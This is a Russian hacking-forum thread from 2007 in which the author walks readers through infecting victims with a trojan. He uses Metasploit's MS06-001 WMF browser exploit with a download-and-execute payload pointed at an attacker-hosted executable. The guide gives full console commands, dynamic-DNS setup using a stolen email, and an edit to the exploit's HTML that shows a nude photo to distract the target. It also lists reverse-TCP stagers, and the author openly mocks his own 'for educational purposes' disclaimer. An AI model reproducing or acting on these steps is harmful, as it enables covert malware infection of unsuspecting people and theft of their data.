[Взлом] Как впарить трояна... Metasploit Framework 3 (для ламеров)

Тема в разделе "Статьи и Co", создана пользователем DRUG_ADDICT, 12 апр 2007.

Статус темы:
Закрыта.
  1. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    [​IMG]

    Привет :-]

    В предыдущих статьях я рассказывал как создать и как спрятать троянский вирус.
    И так ты создал, спрятал и думаешь а как мне его в парить лоху ? Хммм... Есть много способов и ты о них наверняка уже знаешь… Но я тебе хочу предложить более экзотический способ, более профессиональный способ, который наверняка поможет тебе в будущим занимала чем то эдаким УЖАСНЫМ. Короче ты меня понял. НЕ ТУПИ !

    ------------------------------
    Ты когда небуть хотел дать троя своей жертве так чтоб она даже не думала что это что то плохое :) ? Например вот по такой ссылке > http://madona.zapto.org/madona.jpg ?
    Я знаю, ты не только хотел это сделать ты МЕЧТАЛ об этом !!!
    Вот на этом предисловие и остановимся. Собственно сегодня мы это и будим делать !

    ------------------------------
    Ну как всегда. Что нам нужно ?
    Нам нужна так называемая консоль «Metasploit Framework 3» (рус. «МетаСплоит») + нам нужна «плохая программа» (ну в смысле трой, вирус или бот) предлагаю «Pinch» + нужна программа «No-Ip DUC» и регистрация на сайте no-ip.com + нужна голова и желание.

    Что же такое «Metasploit» ?
    Ну начнем с того что же вообще такое «Exploit» (рус. «Сплоит»).

    -----------
    Exploit – это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы. (с) ru.wikipedia.org

    -----------
    Shell-код, код оболочки (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе. (с) ru.wikipedia.org

    -----------
    Metasploit – это пакет имеющий два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. (с) antichat.ru

    -----------
    Для чего нам нужна плохая программа ?
    )=D БЕС КОММЕНТАРИЕВ !

    -----------
    А для чего нужна тогда программа «No-Ip DUC» и регистрация ?
    Это чтобы ссылка выгладила красива. ((http://madona.zapto.org/) за вместо IP адреса)
    Вообще скажу так, No-Ip.com предоставляет доменное имя для ДИНОМИЧИСКИХ Ip-адресов (в смысле домен). И предоставляется это БЕСПЛАТНО (смотря какой домен).
    А программа «No-Ip DUC» привязывает этот домен к твоему Ip-адресу.

    ------------------------------
     
  2. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    Ну всё с теорией покончено ! Давайте же посмотрим что из себя представляет «Metasploit Framework 3» визуально >>>

    [​IMG]
    Рис 1.1

    -----------
    Наш «Metasploit Framework 3» имеет 116 Exploit`ов и 99 Shell`ов
    Код:
           =[ msf v3.0-beta-dev
    + -- --=[ 116 exploits - 99 payloads
    + -- --=[ 17 encoders - 4 nops
           =[ 17 aux
    
    -----------
    Наберём команду Help (справка)

    [​IMG]
    Рис 1.2

    Команды >>>
    Код:
    ? ---------------------- Help menu (вывод этого хелпа на экран)
    Back ----------------- Move back from the current context (переместиться назад от текущего контекста)
    Banner --------------- Display an awesome metasploit banner (выводит на экран баннер Metasploit`а (то что выводится в начале))
    Cd --------------------- Change the current working directory (смена рабочей директории)
    Exit -------------------- Exit the console (выход из консоли)
    Help -------------------- Help menu (вывод этого хелпа на экран)
    Info --------------------- Displays information about one or more module (Вывести на экран информацию об одном или нескольких модулях)
    Irb ----------------------- Drop into irb scripting mode (Упасть (перейти) в irb скриптинг режим)
    Jobs --------------------- Displays and manages jobs (Отобразить и управлять задачами)
    Load --------------------- Load a framework plugin (Загрузить плагин фрамворка)
    Loadpath ---------------- Searches for and loads modules from a path (Поиск путей загруженных модулей)
    Quit --------------------- Exit the console (Выход из консоли)
    Route ------------------- Route traffic through a session (Маршрут траффа через сеанс)
    Save -------------------- Saves the active datastores (Сохранить активную историю данных)
    Sessions ---------------- Dump session listings and display information about sessions (Дампит листинг сессий и выводит информацию о них)
    Set --------------------- Sets a variable to a value (Устанавливает значение переменной)
    Setg -------------------- Sets a global variable to a value (Устанавливает значение глобальной переменной)
    Show ------------------- Displays modules of a given type, or all modules (Выводит на экран модули по типу или все модули)
    Sleep ------------------- Do nothing for the specified number of seconds (Бездействие столько-то секунд)
    Unload ------------------ Unload a framework plugin (Выгрузить плагин фрамворка)
    Unset -------------------- Unsets one or more variables (Сбросить одну или более переменных)
    Unsetg ------------------- Unsets one or more global variables (Сбросить одну или более глобальных переменных)
    Use ------------------------ Selects a module by name (Использовать (выбрать) модуль (эксплоит) по имени)
    Version ------------------ Show the console library version number (Показать номер версии фрамворка и консоли)
    
    (с) antichat.ru

    -----------
    Давайте наберём команду show exploits

    [​IMG]
    Рис 1.3

    Мы видим список Exploit`ов… он прекрасен :))

    -----------
    Давайте наберём команду show payloads

    [​IMG]
    Рис 1.4

    Мы видим список Shell`ов…

    -----------
    Теперь ты понял что такое команды и консоль. И как они выглядят и как работают.

    ------------------------------
    Так. Давай скачаем «Metasploit Framework 3» и установим его.

    Собственно качаем >>> http://metasploit.com/projects/Framework/msf3/#download
    Скачиваем именно:
    3.0 Beta 1 framework-3.0-beta-1.exe Windows 2000/XP/2003 (bundled Cygwin) Во избежание каких либо неурядиц :)) потому как статья пишется именно под v. 3.0 Beta 1

    [​IMG]
    Рис 2.1

    И постепенно мы переходим к практике…
     
  3. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    -----------
    Скачали ? Устанавливаем именно в C:\Program Files\ по умолчанию. Так будет легче мне с тобой работать дальше :))
    Вот наш «Metasploit Framework 3» С:\Program Files\Metasploit\Framework3\msfconsole.bat <<<

    ------------------------------
    Теперь давай зарегистрируйся на http://no-ip.com <<<
    Если ты в албанском (англ.) НУБ. Слушай меня !!!

    [​IMG]
    Рис 2.2

    Жми… Sign-up Now! как показано на рисунке.
    И в води все свои не существующие данные, кроме мыла (мыло желательно угнанное (чужое))

    -----------
    Зарегистрировался ? Молодец !

    Идём дальше…

    [​IMG]
    Рис 2.3

    Нажимаем на «Add»

    -----------
    Видим >>>

    [​IMG]
    Рис 2.4

    Выбираем домен (У ТЕБЯ СВОЙ) всё остальное оставляем как есть.
    Выбирай бесплатный домен (FREE) нууу а если хочеш можиш и купить домен для своего IP/

    -----------
    После в низу нажимай «Create Host»
    И тебе сообщают что доменное имя к акуанту привязано.

    Осталось тока привязать его к твоему IP адресу :))

    ------------------------------
    Едем дальше… качай программку «NO-IP DUC» 668K
    >>> http://www.no-ip.com/downloads.php?page=win
    Нажимай «Download 2.2.1» После нажимай «Download Now» всё.

    [​IMG]
    Рис 3.1

    Скачал ?

    -----------
    Едем, плывём, танцуем (как тебе луче) ДАЛЬШЕ >>>

    А вот и программка такая маленькая и умная аш глаза радуются :)) Ой о чём это я, ах да вот >>>

    [​IMG]
    Рис 3.2

    Ну всё она сама всё сделал за тебя и привязала к твоему IP-адресу домен «madona.zapto.org» (У ТЕБЯ СВОЙ)
    Если это не произошло… то кликай на кнопку «Edit» в программе. В води свой логин (мыло) и пароль от ака на no-ip.com (не путать с паролём от мыла).
     
  4. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    ------------------------------
    Ну наконец-то - скажешь ты - мы переходим не посредственно к «Metasploit Framework 3»

    Способ атаки будет таков:
    Мы: Windows XP/NT
    Он/Она (жерта:( Windows XP/NT

    Такс…

    Запусти «Metasploit» С:\Program Files\Metasploit\Framework3\msfconsole.bat
    Набери: show exploits

    -----------
    Найди строчку:
    Код:
    windows/browser/ms06_001_wmf_setabortproc ------- Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
    [​IMG]
    Рис 4.1

    ms06_001_wmf_setabortpro <<< Это наш Сплоит для Браузера IE 6 (Internet Explorer) который мы будем использовать.

    -----------
    Теперь набери: show payloads

    Найди строчку:
    Код:
    windows/download_exec ------- Windows Executable Download and Execute
    [​IMG]
    Рис 4.2

    download_exec <<< Это наш Shell

    -----------
    А вот сейчас мы этот сплоит выберем командой: use [путь/имя_сплоита]

    Вот так:
    Код:
    msf > use windows/browser/ms06_001_wmf_setabortproc
    [​IMG]
    Рис 4.3

    На рисунке видно что сплоит выбран:

    Код:
    msf > use windows/browser/ms06_001_wmf_setabortproc
    msf exploit(ms06_001_wmf_setabortproc) >
    -----------
    Командуем info:

    Код:
    msf exploit(ms06_001_wmf_setabortproc) > info
    Видим следующие:

    Код:
       Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
       Version: 3906
       Platform: Windows
     Privileged: No
    	License: Metasploit Framework License v1.0
    
    Provided by:
      hdm <hdm@metasploit.com>
      san <san@xfocus.org>
      O600KO78RUS <O600KO78RUS@unknown.ru>
    
    Available targets:
      Id  Name							 
      --  ----							 
      0   Windows XP/2003/Vista Automatic  
    
    Basic options:
      Name	 Current Setting  Required  Description										  
      ----	 ---------------  --------  -----------										  
      SRVHOST  195.239.203.203  yes	   The local host to listen on.						 
      SRVPORT  8080			 yes	   The local port to listen on.						 
      URIPATH				   no		The URI to use for this exploit (default is random)  
    
    Payload information:
      Space: 1852
      Avoid: 1 characters
    
    Description:
      This module exploits a vulnerability in the GDI library included 
      with Windows XP and 2003. This vulnerability uses the 'Escape' 
      metafile function to execute arbitrary code through the SetAbortProc 
      procedure. This module generates a random WMF record stream for each 
      request.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx
      http://www.securityfocus.com/bid/16074
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560
      http://www.osvdb.org/21987
      http://milw0rm.com/metasploit.php?id=111
      http://www.microsoft.com/technet/security/advisory/912840.mspx
      http://wvware.sourceforge.net/caolan/ora-wmf.html
      http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt
    
    Строка:
    SRVHOST (LHOST) 195.239.203.203 ---- Наш IP-адрес на катором повиснет сплоит. (У ТЕБЯ СВОЙ IP)
    SRVPORT (PHOST) 8080 ------------------ Порт на катаром будет работать сплоит.
    URIPATH (URIPATH) -------------------------- Главная наверно фича «Metasploit Framework 3»

    ------------------------------

    Добавлено через 1 минуту
    Настраиваем сплоит

    Командуем set LHOST ваш.ip.адрес:

    Код:
    msf exploit(ms06_001_wmf_setabortproc) > set LHOST 195.239.203.203
    LHOST => 195.239.203.203
    Настроили IP-адерс.

    -----------
    Командуем set URIPATH madona.jpg:

    Код:
     msf exploit(ms06_001_wmf_setabortproc) > set URIPATH madona.jpg
    URIPATH => madona.jpg 
    Присвоили значение не полной ссылке «/madona.jpg

    -----------
    Командуем set PAYLOAD windows/download_exec:

    Код:
    msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/download_exec
    PAYLOAD => windows/download_exec
    Прикрутили Shell к нашему Exploit`у

    ------------------------------
    Настраиваем Shell

    Командуем set URL http://ВАШ_САЙТ.ru/123.exe

    Код:
    msf exploit(ms06_001_wmf_setabortproc) > set URL http://***********.ru/123.exe
    URL => http://***********.ru/123.exe 
    123.exe --- это наша «плохая программа». Спецом заранее залита на ваш хостинг :))

    Если этот Shell не хочет работать т.к. закачивать троя на комп жертве.
    То воспользуйтесь более функциональными Shell`ми из этой серии...


    Код:
    windows/download_exec ------------ Windows Executable Download and Execute                                          
    windows/download_exec/bind_tcp --------- Windows Executable Download and Execute, Bind TCP Stager                         
    windows/download_exec/find_tag --------- Windows Executable Download and Execute, Find Tag Ordinal Stager                 
    windows/download_exec/reverse_http ---- Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager  
    windows/download_exec/reverse_ord_tcp - Windows Executable Download and Execute, Reverse Ordinal TCP Stager              
    windows/download_exec/reverse_tcp ------ Windows Executable Download and Execute, Reverse TCP Stager 
    Например Shell reverse_tcp может открыть CMD жертвы. Нооо это уже другая история...

    ------------------------------
    Всё наш эдакий «экзотический способ» в паривания троя ГОТОВ !!!

    Командуем exploit:

    [​IMG]
    Рис 4.4

    Код:
    msf exploit(ms06_001_wmf_setabortproc) > exploit
    [*] Using URL: http://195.239.203.203:8080/madona.jpg
    [*] Server started.[*] Exploit running as background job.
    msf exploit(ms06_001_wmf_setabortproc) >
    За вместо IP-адреса
    http://195.239.203.203:8080/madona.jpg
    мы делаем.
    http://madona.zapto.org:8080/madona.jpg
    тоесь как делаем ручками, ручками…

    ------------------------------
    Всё можно найти лоха и дать ему ссылку.
    После чего к нему на комп загрузится .wmf файл :)) а после и ваш трой и запустиЦо.
     
  5. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    ------------------------------
    Но эмммм… есть одна небольшая проблемка… :))
    Когда человек откроет эту страничку к сожалению он не увидит фотки и может сразу закрыть окно Браузера.
    Это не хорошо т.к. Этот сплоит на переполнение и чтобы всё начело работать надо не которое время подождать ну примерно секунд 10. А в это время пока идут 10 секунд лох видит в Браузере надпись «One second please...».
    Это очень подозрительно вам так не кажется ?

    -----------
    Как же от этого избавится…
    Очень, очень просто… надо найти исходник этого сплоита и изменить его. :))

    Исходник >>>

    C:\Program Files\Metasploit\Framework3\home\framework\modules\exploits\windows\browser\ms06_001_wmf_setabortproc.rb

    Открываем это сплоит через Word (обычный (не офис))
    Ищем строку:
    Код:
    html =
    "<html><meta http-equiv='refresh' content='0; URL=" +
    get_resource + '/' + 
    Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
    ".#{ext}'><body>One second please...</body></html>"
    -----------
    Если вы хоть малость понимаете в HTML то вы уже просекли в чем тут дела :))
    Ну а если вы не парите даже в HTML тоооо… ну что же и такое бывает :)) мы все люди.

    Код:
    html =
    "<html><meta http-equiv='refresh' content='0; URL=" +
    get_resource + '/' + 
    Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
    ".#{ext}'><body><center><img src="http://ВАШ_САЙТ/ВАША_ФОТКА.jpg"></img></center></body></html>"
    http://ВАШ_САЙТ/ВАША_ФОТКА.jpg наверное вы уже п0нели что луче сделать какунеть фотку голой мадонны аля 80-ых…

    -----------
     
  6. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    Теперь лох будет любоваться на соски мадонны, а в это время к нему будет потихоньку проникать «ваша плохая программа» :)) в премом смысле…

    [​IMG]

    ------------------------------
    Ну всё желаю всем удачи и т.д. И не попадайтесь…

    Напомню что типа мол :))
    Автор (тоесть Я) предоставил этот материал только для ознакомительных целей.
    За использование данного материала автор ответственности не несет.


    Copyright the text and images by NARCOMAN © 2007 (30.1.2007)
    ------------------------------

    Но на самом деле мы то знаем что это всё ПИЗД*** И щас ты схватиш этот грёбаный МетоСплоит и будете хаКать весь инет…
    -----------
    В следующих статях я незнаю что я буду писать :((
    Попросите меня мож чё придумаем :))
    -----------
    http://forum.antichat.ru/threadnav24465-1-10-metasploit.html <<< сплоиты для IE.

    И ещё :)) если в настройках сплоита указать порт 80 (при это у себя его оставить свободным т.к. не использовать) то в ссылки http://madona.zapto.org:80/madona.jpg < порт указывать НЕ НАДО ! Тоесть > http://madona.zapto.org/madona.jpg всё.
     
  7. gruppastimul

    gruppastimul Ваш

    Регистр.:
    22 окт 2006
    Сообщения:
    802
    Симпатии:
    130
    интересно и это действительно всё работает ? :)
     
  8. DRUG_ADDICT

    DRUG_ADDICT Создатель

    Регистр.:
    9 янв 2007
    Сообщения:
    33
    Симпатии:
    12
    Да работает... Но ммм мне вот тут кореш по нулледу.вс сказал что ну не туда не в ту тему то я про троянов запостил... млин... эмсори... ток не банти меня плиз.. просто перенесите эти темы куда надо :))

    А то это написано типа:
    Материалы / Materials
    Статьи и не только по СЕО
    :confused: вот вообщем то прочитав это я не долго дамая начел постить.. ещё рас извените.
     
  9. boooster

    boooster Прохожие

    Не хочу тебя огорчать, то WMF-бага прокатит сейчас только на тех компах, где стоит необновленный антивирь... вероятность, конечно, есть, но уж больно старый сполит под это все выбран... а новых в паблике пока нет :( так что все не так радужно, как казалось....:-]
     
  10. Alex187

    Alex187 Писатель

    Регистр.:
    13 май 2007
    Сообщения:
    8
    Симпатии:
    0
    Подскажите но апи и ему подобные с серыми айпи будут работать?
     
Статус темы:
Закрыта.